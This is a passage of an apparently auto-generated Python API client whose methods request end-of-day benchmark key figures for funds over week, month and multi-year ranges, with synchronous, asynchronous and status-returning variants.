Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2002
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_month_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_1_get_with_http_info(
self,
id,
id_notation_benchmark,
**kwargs
) -> typing.Tuple[InlineResponse2002, int, typing.MutableMapping]:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one month. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one month. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2002
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_month_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_1_get_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[InlineResponse2002]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one month. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one month. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2002]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_month_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_1_get_with_http_info_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2002, int, typing.MutableMapping]]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one month. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one month. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2002, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_month_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_3_get(
self,
id,
id_notation_benchmark,
**kwargs
) -> InlineResponse2002:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of three months. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of three months. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2002
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_month_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_3_get_with_http_info(
self,
id,
id_notation_benchmark,
**kwargs
) -> typing.Tuple[InlineResponse2002, int, typing.MutableMapping]:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of three months. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of three months. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2002
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_month_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_3_get_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[InlineResponse2002]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of three months. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of three months. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2002]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_month_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_3_get_with_http_info_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2002, int, typing.MutableMapping]]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of three months. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of three months. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2002, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_month_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_week_1_get(
self,
id,
id_notation_benchmark,
**kwargs
) -> InlineResponse2003:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one week. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one week. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2003
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_week_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_week_1_get_with_http_info(
self,
id,
id_notation_benchmark,
**kwargs
) -> typing.Tuple[InlineResponse2003, int, typing.MutableMapping]:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one week. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one week. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2003
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_week_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_week_1_get_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[InlineResponse2003]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one week. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one week. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2003]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_week_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_week_1_get_with_http_info_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2003, int, typing.MutableMapping]]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one week. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one week. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2003, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_week_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_1_get(
self,
id,
id_notation_benchmark,
**kwargs
) -> InlineResponse2002:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one year. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one year. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2002
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_1_get_with_http_info(
self,
id,
id_notation_benchmark,
**kwargs
) -> typing.Tuple[InlineResponse2002, int, typing.MutableMapping]:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one year. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one year. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2002
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_1_get_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[InlineResponse2002]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one year. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one year. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2002]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_1_get_with_http_info_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2002, int, typing.MutableMapping]]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of one year. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of one year. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2002, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_3_get(
self,
id,
id_notation_benchmark,
**kwargs
) -> InlineResponse2002:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of three years. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of three years. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2002
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_3_get_with_http_info(
self,
id,
id_notation_benchmark,
**kwargs
) -> typing.Tuple[InlineResponse2002, int, typing.MutableMapping]:
"""End-of-day (EOD) benchmark key figures of a fund for the time range of three years. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of three years. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2002
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_3_get_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[InlineResponse2002]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of three years. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of three years. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2002]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['id'] = \
id
kwargs['id_notation_benchmark'] = \
id_notation_benchmark
return self.get_fund_notation_key_figures_benchmark_year_3_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_year_3_get_with_http_info_async(
self,
id,
id_notation_benchmark,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2002, int, typing.MutableMapping]]":
"""End-of-day (EOD) benchmark key figures of a fund for the time range of three years. # noqa: E501
End-of-day (EOD) benchmark key figures of a fund for the time range of three years. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
id (str): Identifier of the notation.
id_notation_benchmark ([str]): List of benchmark notations.
Keyword Args:
attributes ([str]): Limit the attributes returned in the response to the specified set.. [optional]
language (str): ISO 639-1 code of the language.. [optional]
